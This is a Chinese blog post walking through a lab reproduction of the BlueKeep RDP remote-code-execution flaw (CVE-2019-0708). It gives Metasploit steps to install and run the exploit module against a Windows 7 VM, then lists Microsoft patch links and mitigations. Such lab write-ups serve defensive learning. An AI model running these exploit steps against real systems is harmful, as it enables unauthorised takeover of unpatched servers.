CVE-2019-0708漏洞復現(EXP利用)
2019年5月15號Windows釋出補丁,該補丁修復了遠端桌面中存在的遠端程式碼執行漏洞CVE-2019-0708,該漏洞透過檢查使用者的身份驗證,繞過認證,可直接透過rdp協議進行連線併傳送惡意程式碼。一旦被利用會導致伺服器入侵,可造成像WannaCry永恆之藍漏洞一樣大規模的感染。
2019年9月7日凌晨,metaspolit更新了漏洞利用程式,可遠端程式碼執行獲取系統許可權。
0x01環境
攻擊機:kali(192.168.9.128)
靶機:windows7sp1(192.168.9.132)
kali攻擊機下載metasploit攻擊指令碼,kali中執行以下命令。
wget
wget
wget
wget
下載完成後複製指令碼到metasploit-framework中,可執行如下命令:
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
0x02復現過程
1.準備環境
Kali中使用命令:msfconsole進入metasploit中
進入metasploit中使用命令:reload_all載入複製過去的指令碼
在metasploit中使用命令:search0708搜尋EXP指令碼
2.使用模組
在metasploit中使用命令: useexploit/windows/rdp/cve_2019_0708_bluekeep_rce載入攻擊模
再使用show options檢視模組資訊
3.設定引數
設定關鍵選項RHOSTS/RPORT/TARGET
set rhosts 192.168.9.132
setrport 3389
settarget 3
(因為我們使用的是VMware,所以可以使用target 3)
4.開始攻擊
使用exploit開始攻擊,成功建立連線。
0x03修復建議
CVE-2019-0708漏洞修復補丁以及安全建議
有些windows2008系統打不了補丁的一般是資料中心版本,可以設定一下伺服器,計算機右鍵屬性-遠端設定-僅允許執行使用網路基本身份驗證的遠端桌面的計算機連線(更安全)(N),在這行點勾,然後確認即可,可以臨時的防止漏洞的攻擊。
如果對補丁不知道該如何修復的,可以啟用阿里雲的埠安全策略,禁止掉3389遠端埠,只允許自己的IP通訊即可。
1.Windows Server 2008 漏洞補丁系列下載地址
Windows Server 2008 32位系統:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu
Windows Server 2008 x64位系統:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu
Windows Server 2008 R2Itanium系統:
http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu
Windows Server 2008 R2 x64系統:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Windows Server 2008Itanium:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu
2.Windows Server 2003 漏洞補丁系列下載地址
Windows Server 2003 32位系統:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
Windows Server 2003 64位系統:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe
3. Windows XP 漏洞補丁系列下載地址
Windows XP SP3 32位系統:
http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
Windows XP SP2 64位系統:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe
Windows XP SP3 for XPe:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/69946337/viewspace-2656517/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- PHP檔案包含漏洞(利用phpinfo)復現PHP
- 從CVE復現看棧溢位漏洞利用
- weblogic 漏洞復現Web
- Apache漏洞復現Apache
- WordPress網站漏洞利用及漏洞修復解決方案網站
- 再探Stagefright漏洞——POC與EXP
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- 笑臉漏洞復現
- Tomcat系列漏洞復現Tomcat
- Vulhub WebLogic漏洞復現Web
- weblogic ssrf漏洞復現Web
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- struts2架構網站漏洞修復詳情與利用漏洞修復方案架構網站
- CVE-2020-0796永恆之黑復現POC EXP以及修復方案
- 一款線上的POc,CVE,EXP漏洞利用線上搜尋引擎很強大!
- 護網漏洞復現(三)
- Weblogic-SSRF漏洞復現Web
- 【漏洞復現】Shiro<=1.2.4反序列化漏洞
- phpcms網站漏洞修復遠端程式碼寫入快取漏洞利用PHP網站快取
- CVE-2015-5254漏洞復現
- CVE-2016-3088漏洞復現
- Redis未授權漏洞復現Redis
- IIS短檔名漏洞復現
- nginx目錄穿越漏洞復現Nginx
- 【漏洞復現】Paraluni 安全事件分析事件
- CVE2019-11043漏洞復現
- cve-2020-1472 漏洞復現
- 重要通知|綠盟NIPS釋出CVE-2019-0708漏洞防護規則
- ruoyi漏洞利用
- 在補丁上戳個洞——利用已經被修復的漏洞實現IE沙箱逃逸
- 某小型CMS漏洞復現審計
- 資料庫安全-ElasticSearch漏洞復現資料庫Elasticsearch
- ThinkAdmin漏洞(CVE-2020-25540 )復現
- CVE-2019-15107_webmin漏洞復現Web
- weblogic(CVE-2019-2725)漏洞復現Web
- Fastjson反序列化漏洞復現ASTJSON
- nginx檔名邏輯漏洞_CVE-2013-4547漏洞復現Nginx
- 正規表示式之(exp),(?:exp),(?=exp) 理解